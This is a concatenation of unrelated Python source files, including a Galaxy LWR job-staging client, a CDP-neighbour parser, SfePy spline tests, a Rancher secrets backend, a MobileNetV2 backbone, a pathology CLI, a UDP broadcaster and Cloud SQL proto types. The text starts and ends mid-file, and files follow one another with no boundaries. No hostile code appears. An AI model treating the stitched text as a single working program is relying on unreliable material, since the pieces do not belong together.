__init__(self, command_line, config_files): self.rewritten_command_line = command_line self.rewritten_config_files = {} for config_file in config_files or []: config_contents = _read(config_file) self.rewritten_config_files[config_file] = config_contents def find_referenced_subfiles(self, directory): """ Return list of files below specified `directory` in job inputs. Could use more sophisticated logic (match quotes to handle spaces, handle subdirectories, etc...). **Parameters** directory : str Full path to directory to search. """ pattern = r"(%s%s\S+)" % (directory, os.sep) referenced_files = set() for input_contents in self.__items(): referenced_files.update(re.findall(pattern, input_contents)) return list(referenced_files) def path_referenced(self, path): pattern = r"%s" % path found = False for input_contents in self.__items(): if re.findall(pattern, input_contents): found = True break return found def rewrite_paths(self, local_path, remote_path): """ Rewrite references to `local_path` with `remote_path` in job inputs. 
""" self.__rewrite_command_line(local_path, remote_path) self.__rewrite_config_files(local_path, remote_path) def __rewrite_command_line(self, local_path, remote_path): self.rewritten_command_line = self.rewritten_command_line.replace(local_path, remote_path) def __rewrite_config_files(self, local_path, remote_path): for config_file, rewritten_contents in self.rewritten_config_files.iteritems(): self.rewritten_config_files[config_file] = rewritten_contents.replace(local_path, remote_path) def __items(self): items = [self.rewritten_command_line] items.extend(self.rewritten_config_files.values()) return items class FileStager(object): """ Objects of the FileStager class interact with an LWR client object to stage the files required to run jobs on a remote LWR server. **Parameters** client : Client LWR client object. command_line : str The local command line to execute, this will be rewritten for the remote server. config_files : list List of Galaxy 'configfile's produced for this job. These will be rewritten and sent to remote server. input_files : list List of input files used by job. These will be transferred and references rewritten. output_files : list List of output_files produced by job. tool_dir : str Directory containing tool to execute (if a wrapper is used, it will be transferred to remote server). working_directory : str Local path created by Galaxy for running this job. """ def __init__(self, client, command_line, config_files, input_files, output_files, tool_dir, working_directory): """ """ self.client = client self.command_line = command_line self.config_files = config_files self.input_files = input_files self.output_files = output_files self.tool_dir = os.path.abspath(tool_dir) self.working_directory = working_directory # Setup job inputs, these will need to be rewritten before # shipping off to remote LWR server. self.job_inputs = JobInputs(self.command_line, self.config_files) self.file_renames = {} self.__handle_setup() self.__initialize_referenced_tool_files() self.__upload_tool_files() self.__upload_input_files() self.__upload_working_directory_files() self.__initialize_output_file_renames() self.__initialize_task_output_file_renames() self.__initialize_config_file_renames() self.__handle_rewrites() self.__upload_rewritten_config_files() def __handle_setup(self): job_config = self.client.setup() self.new_working_directory = job_config['working_directory'] self.new_outputs_directory = job_config['outputs_directory'] self.remote_path_separator = job_config['path_separator'] # If remote LWR server assigned job id, use that otherwise # just use local job_id assigned. galaxy_job_id = self.client.job_id self.job_id = job_config.get('job_id', galaxy_job_id) if self.job_id != galaxy_job_id: # Remote LWR server assigned an id different than the # Galaxy job id, update client to reflect this. 
self.client.job_id = self.job_id def __initialize_referenced_tool_files(self): self.referenced_tool_files = self.job_inputs.find_referenced_subfiles(self.tool_dir) def __upload_tool_files(self): for referenced_tool_file in self.referenced_tool_files: tool_upload_response = self.client.upload_tool_file(referenced_tool_file) self.file_renames[referenced_tool_file] = tool_upload_response['path'] def __upload_input_files(self): for input_file in self.input_files: self.__upload_input_file(input_file) self.__upload_input_extra_files(input_file) def __upload_input_file(self, input_file): if self.job_inputs.path_referenced(input_file): input_upload_response = self.client.upload_input(input_file) self.file_renames[input_file] = input_upload_response['path'] def __upload_input_extra_files(self, input_file): # TODO: Determine if this is object store safe and what needs to be # done if it is not. files_path = "%s_files" % input_file[0:-len(".dat")] if os.path.exists(files_path) and self.job_inputs.path_referenced(files_path): for extra_file in os.listdir(files_path): extra_file_path = os.path.join(files_path, extra_file) relative_path = os.path.basename(files_path) extra_file_relative_path = os.path.join(relative_path, extra_file) response = self.client.upload_extra_input(extra_file_path, extra_file_relative_path) self.file_renames[extra_file_path] = response['path'] def __upload_working_directory_files(self): # Task manager stages files into working directory, these need to be # uploaded if present. for working_directory_file in os.listdir(self.working_directory): path = os.path.join(self.working_directory, working_directory_file) working_file_response = self.client.upload_working_directory_file(path) self.file_renames[path] = working_file_response['path'] def __initialize_output_file_renames(self): for output_file in self.output_files: self.file_renames[output_file] = r'%s%s%s' % (self.new_outputs_directory, self.remote_path_separator, os.path.basename(output_file)) def __initialize_task_output_file_renames(self): for output_file in self.output_files: name = os.path.basename(output_file) self.file_renames[os.path.join(self.working_directory, name)] = r'%s%s%s' % (self.new_working_directory, self.remote_path_separator, name) def __initialize_config_file_renames(self): for config_file in self.config_files: self.file_renames[config_file] = r'%s%s%s' % (self.new_working_directory, self.remote_path_separator, os.path.basename(config_file)) def __rewrite_paths(self, contents): new_contents = contents for local_path, remote_path in self.file_renames.iteritems(): new_contents = new_contents.replace(local_path, remote_path) return new_contents def __handle_rewrites(self): for local_path, remote_path in self.file_renames.iteritems(): self.job_inputs.rewrite_paths(local_path, remote_path) def __upload_rewritten_config_files(self): for config_file, new_config_contents in self.job_inputs.rewritten_config_files.iteritems(): self.client.upload_config_file(config_file, new_config_contents) def get_rewritten_command_line(self): """ Returns the rewritten version of the command line to execute suitable for remote host. """ return self.job_inputs.rewritten_command_line class Client(object): """ Objects of this client class perform low-level communication with a remote LWR server. **Parameters** remote_host : str Remote URL of the LWR server. job_id : str Galaxy job/task id. private_key : str (optional) Secret key the remote LWR server is configured with. 
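**Example** A minimal usage sketch, not part of the original module (the host, job id and key are hypothetical; `command_line`, `output_path` and `working_directory` stand for caller-supplied values): client = Client("https://lwr.example.org:8913/", "123", private_key="moo") job_config = client.setup() client.launch(command_line) client.wait() client.download_output(output_path, working_directory) client.clean()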
""" def __init__(self, remote_host, job_id, private_key=None): if not remote_host.endswith("/"): remote_host = remote_host + "/" ## If we don't have an explicit private_key defined, check for ## one embedded in the URL. A URL of the form ## https://moo@cow:8913 will try to contact https://cow:8913 ## with a private key of moo private_key_format = "https?://(.*)@.*/?" private_key_match = re.match(private_key_format, remote_host) if not private_key and private_key_match: private_key = private_key_match.group(1) remote_host = remote_host.replace("%s@" % private_key, '', 1) self.remote_host = remote_host self.job_id = job_id self.private_key = private_key def _url_open(self, request, data): return urllib2.urlopen(request, data) def __build_url(self, command, args): if self.private_key: args["private_key"] = self.private_key data = urllib.urlencode(args) url = self.remote_host + command + "?" + data return url def __raw_execute(self, command, args={}, data=None): url = self.__build_url(command, args) request = urllib2.Request(url=url, data=data) response = self._url_open(request, data) return response def __raw_execute_and_parse(self, command, args={}, data=None): response = self.__raw_execute(command, args, data) return simplejson.loads(response.read()) def __upload_file(self, action, path, name=None, contents=None): input = open(path, 'rb') try: mmapped_input = mmap.mmap(input.fileno(), 0, access=mmap.ACCESS_READ) return self.__upload_contents(action, path, mmapped_input, name) finally: input.close() def __upload_contents(self, action, path, contents, name=None): if not name: name = os.path.basename(path) args = {"job_id": self.job_id, "name": name} return self.__raw_execute_and_parse(action, args, contents) def upload_tool_file(self, path): """ Upload a tool related file (e.g. wrapper) required to run job. **Parameters** path : str Local path tool. """ return self.__upload_file("upload_tool_file", path) def upload_input(self, path): """ Upload input dataset to remote server. **Parameters** path : str Local path of input dataset. """ return self.__upload_file("upload_input", path) def upload_extra_input(self, path, relative_name): """ Upload extra input file to remote server. **Parameters** path : str Extra files path of input dataset corresponding to this input. relative_name : str Relative path of extra file to upload relative to inputs extra files path. """ return self.__upload_file("upload_extra_input", path, name=relative_name) def upload_config_file(self, path, contents): """ Upload a job's config file to the remote server. **Parameters** path : str Local path to the original config file. contents : str Rewritten contents of the config file to upload. """ return self.__upload_contents("upload_config_file", path, contents) def upload_working_directory_file(self, path): """ Upload the supplied file (path) from a job's working directory to remote server. **Parameters** path : str Path to file to upload. """ return self.__upload_file("upload_working_directory_file", path) def _get_output_type(self, name): return self.__raw_execute_and_parse("get_output_type", {"name": name, "job_id": self.job_id}) def download_work_dir_output(self, source, working_directory, output_path): """ Download an output dataset specified with from_work_dir from the remote server. **Parameters** source : str Path in job's working_directory to find output in. working_directory : str Local working_directory for the job. output_path : str Full path to output dataset. 
""" output = open(output_path, "wb") name = os.path.basename(source) self.__raw_download_output(name, self.job_id, "work_dir", output) def download_output(self, path, working_directory): """ Download an output dataset from the remote server. **Parameters** path : str Local path of the dataset. working_directory : str Local working_directory for the job. """ name = os.path.basename(path) output_type = self._get_output_type(name) if output_type == "direct": output = open(path, "wb") elif output_type == "task": output = open(os.path.join(working_directory, name), "wb") else: raise Exception("No remote output found for dataset with path %s" % path) self.__raw_download_output(name, self.job_id, output_type, output) def __raw_download_output(self, name, job_id, output_type, output_file): response = self.__raw_execute("download_output", {"name": name, "job_id": self.job_id, "output_type": output_type}) try: while True: buffer = response.read(1024) if buffer == "": break output_file.write(buffer) finally: output_file.close() def launch(self, command_line): """ Run or queue up the execution of the supplied `command_line` on the remote server. **Parameters** command_line : str Command to execute. """ return self.__raw_execute("launch", {"command_line": command_line, "job_id": self.job_id}) def kill(self): """ Cancel remote job, either removing from the queue or killing it. """ return self.__raw_execute("kill", {"job_id": self.job_id}) def wait(self): """ Wait for job to finish. """ while True: complete_response = self.raw_check_complete() if complete_response["complete"] == "true": return complete_response time.sleep(1) def raw_check_complete(self): """ Get check_complete response from the remote server. """ check_complete_response = self.__raw_execute_and_parse("check_complete", {"job_id": self.job_id}) return check_complete_response def check_complete(self): """ Return boolean indicating whether the job is complete. """ return self.raw_check_complete()["complete"] == "true" def clean(self): """ Cleanup the remote job. """ self.__raw_execute("clean", {"job_id": self.job_id}) def setup(self): """ Setup remote LWR server to run this job. """ return self.__raw_execute_and_parse("setup", {"job_id": self.job_id}) def _read(path): """ Utility method to quickly read small files (config files and tool wrappers) into memory as strings. 
""" input = open(path, "r") try: return input.read() finally: input.close() 1-10 # -*- coding: utf-8 -*- # --------------------------------------------------------------------- # Linux.RHEL.get_cdp_neighbors # --------------------------------------------------------------------- # Copyright (C) 2007-2017 The NOC Project # See LICENSE for details # --------------------------------------------------------------------- """ ## CDP demon #### 1) "ladvd" see http://www.blinkenlights.nl/software/ladvd/ get ftp://ftp5.gwdg.de/pub/opensuse/repositories/home:/sten-blinkenlights/ # usermod -G ladvd -a 2) "llpdp" see http://vincentbernat.github.com/lldpd/ get http://software.opensuse.org/download.html?project=home:vbernat&package=lldpd usermod -G _lldpd -a enable CDP in /etc/sysconfig/lldpd : LLDPD_OPTIONS="-c" ## KVM host #### need drop CDP traffic ethX -- bridge -- vnetX dump CDP traffic # tcpdump -nn -v -i bond0 -s 1500 -c 100 'ether[20:2] == 0x2000' # iptables -I FORWARD -m mac --mac 01:00:0C:CC:CC:CC -j DROP """ from noc.core.script.base import BaseScript from noc.sa.interfaces.igetcdpneighbors import IGetCDPNeighbors import re class Script(BaseScript): name = "Linux.RHEL.get_cdp_neighbors" interface = IGetCDPNeighbors """ $ ladvdc -C -v Capability Codes: r - Repeater, B - Bridge, H - Host, R - Router, S - Switch, W - WLAN Access Point, C - DOCSIS Device, T - Telephone, O - Other Device ID Local Intf Proto Hold-time Capability Port ID gsw2-73-sar enp2s0 CDP 127 S Gi1/0/4 example.ru eth0 CDP 115 HRS vnet0 """ rx_ladvdc = re.compile( r"(?P\S+)\s+(?P\S+)\s+" r"CDP\s+\d+\s+\S+\s+(?P\S+)\s+\n", re.MULTILINE | re.DOTALL | re.IGNORECASE, ) """ $ lldpcli show neighbors summary ------------------------------------------------------------------------------- LLDP neighbors: ------------------------------------------------------------------------------- Interface: enp2s0, via: CDPv2 Chassis: ChassisID: local gsw2-73-sar SysName: gsw2-73-sar Port: PortID: ifname GigabitEthernet1/0/4 PortDescr: GigabitEthernet1/0/4 ------------------------------------------------------------------------------- """ rx_lldpd = re.compile( r"Interface:\s+(?P\S+), via: CDPv2\n" r"\s+Chassis:\s+\n" r"\s+ChassisID:\s+\S+\s(?P\S+)\n" r"\s+SysName:\s+\S+\n" r"\s+Port:\s+\n" r"\s+PortID:\s+ifname (?P\S+)\n", re.MULTILINE | re.DOTALL | re.IGNORECASE, ) # Linux interface regex check_ifcfg = re.compile( r"(bond\d+|eno\d+|ens\d+|enp\d+s\d+|en[0-9a-fA-F]{8}|eth\d+|vnet\d+)", re.MULTILINE | re.DOTALL | re.IGNORECASE, ) def execute(self): """ https://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames/ """ device_id = self.scripts.get_fqdn() # Get neighbors neighbors = [] map = { "INTERFACE": "local_interface", "HOSTNAME": "device_id", "PORTNAME": "remote_interface", } # try ladvdc id_last = 999 v = self.cli("ladvdc -b -C") if "INTERFACE" in v: for l in v.splitlines(): name, value = l.split("=") id = int(name.split("_")[-1]) name2 = "".join(name.split("_")[:-1]) if name2 not in map: continue if id != id_last: neighbors += [{map[name2]: value.strip("'")}] # print value.strip("'") else: if map[name2] == "remote_interface": neighbors[id][map[name2]] = self.profile.convert_interface_name_cisco( value.strip("'") ) # print map[name2] else: neighbors[id][map[name2]] = value.strip("'") # print map[name2], value.strip("'") id_last = id return {"device_id": device_id, "neighbors": neighbors} """ # Regexp block for match in self.rx_ladvdc.finditer(self.cli("ladvdc -C")): # ladvdc show remote CISCO(!!!) 
interface -> "Gi1/0/4" # but cisco.iso profile need remote interface -> "Gi 1/0/4" !!! # check and convert remote_interface if remote host CISCO if re.match(check_ifcfg, match.group("remote_interface")): remote_if = match.group("remote_interface") else: remote_if = self.profile.convert_interface_name_cisco(match.group("remote_interface")) neighbors += [{ "device_id": match.group("device_id"), "local_interface": match.group("local_interface"), "remote_interface": remote_if, }] """ # try lldpd for match in self.rx_lldpd.finditer(self.cli("lldpcli show neighbors summary")): if self.check_ifcfg.match(match.group("remote_interface")): remote_if = match.group("remote_interface") else: remote_if = self.profile.convert_interface_name_cisco( match.group("remote_interface") ) neighbors += [ { "device_id": match.group("device_id"), "local_interface": match.group("local_interface"), "remote_interface": remote_if, } ] return {"device_id": device_id, "neighbors": neighbors} Gkdnz/SfePy from sfepy.base.testing import TestCommon import numpy as nm from sfepy import data_dir from sfepy.mesh.splinebox import SplineBox, SplineRegion2D from sfepy.mesh.bspline import BSpline from sfepy.discrete.fem import Mesh def tetravolume(cells, vertices): vol = 0.0 c1 = nm.ones((4,4), dtype=nm.float64) mul = 1.0 / 6.0 for ic in cells: c1[:,:3] = vertices[ic,:] vol += mul * nm.linalg.det(c1) return -vol tolerance = 1e-6 class Test(TestCommon): @staticmethod def from_conf(conf, options): return Test(conf=conf, options=options) def test_spbox_3d(self): """ Check volume change of the mesh which is deformed using the SplineBox functions. """ from sfepy.discrete.fem import Mesh from sfepy.mesh.splinebox import SplineBox mesh = Mesh.from_file(data_dir + '/meshes/3d/cylinder.vtk') conn = mesh.get_conn('3_4') vol0 = tetravolume(conn, mesh.coors) bbox = nm.array(mesh.get_bounding_box()).T spbox = SplineBox(bbox, mesh.coors) cpoints0 = spbox.get_control_points(init=True) for ii in range(4): for jj in range(4): spbox.move_control_point((0, ii, jj), [-0.02, 0, 0]) coors = spbox.evaluate() vol1 = tetravolume(conn, coors) mesh.coors[:] = coors spbox.set_control_points(cpoints0) coors = spbox.evaluate() vol2 = tetravolume(conn, coors) ok = True actual_volumes = (vol0, vol1, vol2) expected_volumes = (1.22460186e-4, 1.46950423e-4, 1.22460186e-4) for ii in range(3): relerr = abs(actual_volumes[ii] - expected_volumes[ii])\ / expected_volumes[ii] ok = ok and (relerr < tolerance) if not ok: self.report('expected volumes:') self.report(expected_volumes) self.report('actual volumes:') self.report(actual_volumes) return ok def test_spbox_2d(self): """ Check position of a given vertex in the deformed mesh. """ mesh = Mesh.from_file(data_dir + '/meshes/2d/square_tri1.mesh') spb = SplineBox([[-1, 1], [-1, 0.6]], mesh.coors, nsg=[2,1]) spb.move_control_point(1, [0.1, -0.2]) spb.move_control_point(2, [0.2, -0.3]) spb.move_control_point(3, [0.0, -0.1]) pt0 = mesh.coors[175,:].copy() mesh.cmesh.coors[:] = spb.evaluate() pt1 = mesh.coors[175,:] expected_distance = 0.165892726387 actual_distance = nm.linalg.norm(pt0 - pt1) ok = nm.fabs(actual_distance - expected_distance)\ / expected_distance < tolerance if not ok: self.report('expected distance:') self.report(expected_distance) self.report('actual distance:') self.report(actual_distance) return ok def test_spregion2d(self): """ Check position of a given vertex in the deformed mesh. 
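The region boundary is built from four cubic B-splines (left, right, bottom, top) fitted to the point lists below; after moving three control points, the displacement of vertex 145 is compared against a reference distance.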
""" line_l = nm.array([[-1, 1], [-1, .5], [-1, 0], [-1, -.5]]) line_r = nm.array([[0, -.2], [.1, .2], [.3, .6], [.4, 1]]) sp_l = BSpline(3, is_cyclic=False) sp_l.approximate(line_l, ncp=4) kn_lr = sp_l.get_knot_vector() sp_r = BSpline(3, is_cyclic=False) sp_r.approximate(line_r, knots=kn_lr) line_b = nm.array([[-1, -.5], [-.8, -.6], [-.5, -.4], [-.2, -.2], [0, -.2]]) line_t = nm.array([[.4, 1], [0, 1], [-.2, 1], [-.6, 1], [-1, 1]]) sp_b = BSpline(3, is_cyclic=False) sp_b.approximate(line_b, ncp=5) kn_bt = sp_b.get_knot_vector() sp_t = BSpline(3, is_cyclic=False) sp_t.approximate(line_t, knots=kn_bt) mesh = Mesh.from_file(data_dir + '/meshes/2d/square_tri1.mesh') spb = SplineRegion2D([sp_b, sp_r, sp_t, sp_l], mesh.coors) spb.move_control_point(5, [-.2, .1]) spb.move_control_point(10, [-.3, .2]) spb.move_control_point(15, [-.1, .2]) pt0 = mesh.coors[145,:].copy() mesh.cmesh.coors[:] = spb.evaluate() pt1 = mesh.coors[145,:] expected_distance = 0.0908306614584 actual_distance = nm.linalg.norm(pt0 - pt1) ok = nm.fabs(actual_distance - expected_distance)\ / expected_distance < tolerance if not ok: self.report('expected distance:') self.report(expected_distance) self.report('actual distance:') self.report(actual_distance) return ok import os from .base_backend import BaseBackend from compose_flow.kube.mixins import KubeMixIn from compose_flow import shell class RancherBackend(BaseBackend, KubeMixIn): """ Manages Kubernetes Secret storage via Rancher CLI """ kubectl_command = "rancher kubectl" env_key = "_env" @property def namespace(self): return f"compose-flow-{self.project_name.lower()}" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.secret_exists = None self.workflow = kwargs.get("workflow") self.switch_rancher_context() self._check_rancher_namespace() def execute(self, command: str, **kwargs): env = os.environ return shell.execute(command, env, **kwargs) def ls(self) -> list: """List kubectl secrets in the proper namespace""" return self._list_secrets() def read(self, name: str) -> str: return self._read_secret_env(name) def rm(self, name: str) -> None: self._remove_secret(name) def write(self, name: str, path) -> None: """ Saves an environment into a Secret """ return self._write_secret_env(name, path) qixiuai/vega # -*- coding:utf-8 -*- # Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved. # This program is free software; you can redistribute it and/or modify # it under the terms of the MIT License. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # MIT License for more details. """Backbone of mobilenet v2.""" from torchvision.models import MobileNetV2 import torch import torch.nn as nn class MobileNetV2Backbone(MobileNetV2): """Backbone of mobilenet v2.""" def __init__(self, load_path=None): """Construct MobileNetV3Tiny class. :param load_path: path for saved model """ super(MobileNetV2Backbone, self).__init__() self.features = nn.ModuleList(list(self.features)[:18]) if load_path is not None: self.load_state_dict(torch.load(load_path), strict=False) def forward(self, x): """Do an inference on MobileNetV2. 
:param x: input tensor :return: output tensor """ outs = [] for i, feature in enumerate(self.features): x = feature(x) if i in [3, 6, 13, 17]: outs.append(x) return outs # -*- coding: utf-8 -*- """Console script for dicom_wsi.""" import argparse import logging import sys from digipath_mltk.toolkit import * def parse_args(): """Console script for DigiPath_MLTK.""" parser = argparse.ArgumentParser() parser.add_argument("-m", "--method", dest='method', default='wsi_to_patches_dir', choices=['wsi_to_tfrecord', 'tfrecord_to_masked_thumb', 'wsi_to_patches_dir', 'write_mask_preview_set', 'registration_to_dir', 'registration_to_tfrecord', 'annotations_to_dir', 'annotations_to_tfrecord'], help="Method to run") parser.add_argument("-i", "--wsi_filename", dest='wsi_filename', required=True, help="WSI File name") parser.add_argument("-f", "--wsi_floatname", dest='wsi_floatname', required=False, help="offset WSI File name") parser.add_argument("-o", "--output_dir", dest='output_dir', default='.', help="Where to write the images out") parser.add_argument("-c", "--class_label", dest='class_label', default='training_data', help="label name fields for training") parser.add_argument("-d", "--thumbnail_divisor", dest='thumbnail_divisor', default=10, help="Full size divisor to create thumbnail image") parser.add_argument("-S", "--pixel_hw", dest='pixel_hw', default=512, help="Patch size") parser.add_argument("-P", "--patch_select_method", dest='patch_select_method', default='threshold_rgb2lab', choices=['threshold_rgb2lab', 'threshold_otsu'], help="Tissue detection method") parser.add_argument("-T", "--rgb2lab_threshold", dest='rgb2lab_threshold', default=80, help="Detection threshold for rgb2lab detector") parser.add_argument("-e", "--image_level", dest='image_level', default=0, help="Image zoom level") parser.add_argument("-l", "--file_ext", dest='file_ext', default='.png', choices=['.png', '.jpg'], help="Image format type") parser.add_argument("-t", "--threshold", dest='threshold', default=0, help="Image detail & patch size dependent threshold") parser.add_argument("-s", "--patch_stride_fraction", dest='patch_stride_fraction', default=1.0, help="Patch Stride [0-1]") parser.add_argument("-x", "--offset_x", dest='offset_x', default=0, help="Begin at x position") parser.add_argument("-y", "--offset_y", dest='offset_y', default=0, help="Begin at y position") parser.add_argument("-C", "--border_color", dest='border_color', default='blue', help="Border color for mask previews") parser.add_argument("-V", "--verbose", dest="logLevel", choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'], default="INFO", help="Set the logging level") parser.add_argument("-r", "--tfrecord_file_name", dest='tfrecord_file_name', required=False, help="TFRecord File name") parser.add_argument("-D", "--offset_data_file", dest='offset_data_file', required=False, help="registration offset data file name") parser.add_argument("-a", "--xml_file_name", dest='xml_file_name', required=False, help="xml annotations data file name") parser.add_argument("-L", "--csv_file_name", dest='csv_file_name', required=False, help="annotations priority data file name") args = parser.parse_args() logging.basicConfig(stream=sys.stderr, level=args.logLevel, format='%(name)s (%(levelname)s): %(message)s') logger = logging.getLogger(__name__) logger.setLevel(args.logLevel) run_parameters = dict() run_parameters['method'] = args.method run_parameters['wsi_filename'] = args.wsi_filename run_parameters['wsi_floatname'] = args.wsi_floatname 
run_parameters['output_dir'] = args.output_dir run_parameters['class_label'] = args.class_label run_parameters['thumbnail_divisor'] = int(args.thumbnail_divisor) run_parameters['patch_height'] = int(args.pixel_hw) run_parameters['patch_width'] = int(args.pixel_hw) run_parameters['patch_select_method'] = args.patch_select_method run_parameters['rgb2lab_threshold'] = int(args.rgb2lab_threshold) run_parameters['image_level'] = int(args.image_level) run_parameters['file_ext'] = args.file_ext run_parameters['threshold'] = int(args.threshold) run_parameters['patch_stride_fraction'] = float(args.patch_stride_fraction) run_parameters['offset_x'] = int(args.offset_x) run_parameters['offset_y'] = int(args.offset_y) run_parameters['border_color'] = args.border_color run_parameters['tfrecord_file_name'] = args.tfrecord_file_name run_parameters['offset_data_file'] = args.offset_data_file run_parameters['xml_file_name'] = args.xml_file_name run_parameters['csv_file_name'] = args.csv_file_name clean_run_parameters = dict() for k, v in run_parameters.items(): if not v is None: clean_run_parameters[k] = v return clean_run_parameters if __name__ == "__main__": run_parameters = parse_args() if run_parameters['method'] == 'wsi_to_tfrecord': wsi_file_to_patches_tfrecord(run_parameters) if run_parameters['method'] == 'tfrecord_to_masked_thumb': write_tfrecord_marked_thumbnail_image(run_parameters) if run_parameters['method'] == 'wsi_to_patches_dir': image_file_to_patches_directory_for_image_level(run_parameters) if run_parameters['method'] == 'write_mask_preview_set': write_mask_preview_set(run_parameters) if run_parameters['method'] == 'registration_to_dir': run_registration_pairs(run_parameters) if run_parameters['method'] == 'registration_to_tfrecord': run_registration_pairs(run_parameters) if run_parameters['method'] == 'annotations_to_dir': run_annotated_patches(run_parameters) if run_parameters['method'] == 'annotations_to_tfrecord': run_annotated_patches(run_parameters) d0i/lhcast #!/usr/bin/env python """ receives output of lhsplit from stdin and send the segments with broadcast. (initial header segment will be sent multiple times to avoid packet loss) WISH: - sort of reliable protocol for headers hdr-ack shall start body block transfer - sort of reliable data-ack/nack from receivers (nack shall have bitmap of unseen blocks for re-send) NOW(initial test implementation: - just find block boundary and send each block in UDP! This software is part of lhcast Copyright 2015 <> """ import struct import sys import os import socket import pdb import time from lhcommon import * # hidden option TARGET=os.getenv("LHSND_TARGET", TARGET) if __name__ == '__main__': inf = sys.stdin sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) k=None m=None blksz=None while True: pkt = [] # read a byte ts = inf.read(1) if ts == '': break; pkt.append(ts) t = ord(ts) if (t == HTYPE_SEGHDR): # if the byte is HTYPE_SEGHDR, read the header and find the block/segment size. 
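# (The header that follows the type byte carries the segment UID plus the coding parameters k and m and the block size; blksz is remembered so that later HTYPE_BLKHDR packets know how many payload bytes to read.)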
hdr_s = inf.read(SEGHDR_LEN) hdr_t = list(struct.unpack(SEGHDR_FMT, hdr_s)) hdr_t.pop(0)#padding seguid = hdr_t[:SEGUID_LEN] hdr_t = hdr_t[SEGUID_LEN:] k = hdr_t.pop(0) m = hdr_t.pop(0) blksz = hdr_t.pop(0) print 'HDR(k: %d, m: %d, blksz: %d)'%(k, m, blksz) pkt.append(hdr_s) elif (t == HTYPE_BLKHDR): # if the byte is HTYPE_BLKHDR and I already know the segment parameters, read a block hdr_s = inf.read(BLKHDR_LEN) hdr_t = struct.unpack(BLKHDR_FMT, hdr_s) blkid = hdr_t[0] print 'BLK(id: %d)'%(blkid,) pkt.append(hdr_s) pkt.append(inf.read(blksz)) else: raise RuntimeError, "unknown blktype %d"%(t) # then, send the block to the dgram sock. pkt_bytes = ''.join(pkt) sock.sendto(pkt_bytes, (TARGET, PORT)) # print 'Done.' cities = set(input().split()) ox_cities = set(input().split()) lion_cities = set(input().split()) eagle_ox_cities = set(input().split()) lion_eagle_cities = set(input().split()) eagle_ox_lion_cities = eagle_ox_cities.union(lion_eagle_cities) diff_lion_ox = lion_cities.difference(eagle_ox_lion_cities).union(ox_cities.difference(eagle_ox_lion_cities)) eagle_cities = ' '.join(sorted([i for i in cities if i not in diff_lion_ox])) if len(eagle_cities) == 0: print('Нет таких городов') else: print(eagle_cities) 1-10 from dataclasses import dataclass from typing import List from typing import Union from postmanparser.exceptions import MissingRequiredFieldException @dataclass class Cookie: domain: str path: str expires: Union[str, None] = None max_age: str = "" host_only: bool = False http_only: bool = False name: str = "" secure: bool = False session: bool = False value: str = "" extensions: List = None @classmethod def parse(cls, data: dict): domain = data.get("domain") path = data.get("path") if domain is None or path is None: raise MissingRequiredFieldException( "'cookie' object should have 'domain' and 'path' property." ) return cls( domain, path, expires=data.get("expires"), max_age=data.get("maxAge", ""), host_only=data.get("hostOnly", False), http_only=data.get("httpOnly", False), name=data.get("name", ""), secure=data.get("secure", False), session=data.get("session", False), value=data.get("value", ""), extensions=data.get("extensions"), ) 0 import numpy import pandas as pd from pandas_datareader import data as wb pg = wb.DataReader('PG', data_source='yahoo', start='2020-01-01') print (pg) # -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import proto # type: ignore from google.cloud.sql_v1.types import cloud_sql_resources from google.protobuf import wrappers_pb2 # type: ignore __protobuf__ = proto.module( package='google.cloud.sql.v1', manifest={ 'SqlFlagType', 'SqlFlagsListRequest', 'FlagsListResponse', 'Flag', }, ) class SqlFlagType(proto.Enum): r"""""" SQL_FLAG_TYPE_UNSPECIFIED = 0 BOOLEAN = 1 STRING = 2 INTEGER = 3 NONE = 4 MYSQL_TIMEZONE_OFFSET = 5 FLOAT = 6 REPEATED_STRING = 7 class SqlFlagsListRequest(proto.Message): r"""Flags list request. Attributes: database_version (str): Database type and version you want to retrieve flags for. 
By default, this method returns flags for all database types and versions. """ database_version = proto.Field( proto.STRING, number=1, ) class FlagsListResponse(proto.Message): r"""Flags list response. Attributes: kind (str): This is always **sql#flagsList**. items (Sequence[google.cloud.sql_v1.types.Flag]): List of flags. """ kind = proto.Field( proto.STRING, number=1, ) items = proto.RepeatedField( proto.MESSAGE, number=2, message='Flag', ) class Flag(proto.Message): r"""A flag resource. Attributes: name (str): This is the name of the flag. Flag names always use underscores, not hyphens, for example: **max_allowed_packet** type_ (google.cloud.sql_v1.types.SqlFlagType): The type of the flag. Flags are typed to being **BOOLEAN**, **STRING**, **INTEGER** or **NONE**. **NONE** is used for flags which do not take a value, such as **skip_grant_tables**. applies_to (Sequence[google.cloud.sql_v1.types.SqlDatabaseVersion]): The database version this flag applies to. Can be **MYSQL_8_0**, **MYSQL_5_6**, or **MYSQL_5_7**. allowed_string_values (Sequence[str]): For **STRING** flags, a list of strings that the value can be set to. min_value (google.protobuf.wrappers_pb2.Int64Value): For **INTEGER** flags, the minimum allowed value. max_value (google.protobuf.wrappers_pb2.Int64Value): For **INTEGER** flags, the maximum allowed value. requires_restart (google.protobuf.wrappers_pb2.BoolValue): Indicates whether changing this flag will trigger a database restart. Only applicable to Second Generation instances. kind (str): This is always **sql#flag**. in_beta (google.protobuf.wrappers_pb2.BoolValue): Whether or not the flag is considered in beta. allowed_int_values (Sequence[int]): Use this field if only certain integers are accepted. Can be combined with min_value and max_value to add additional values. 
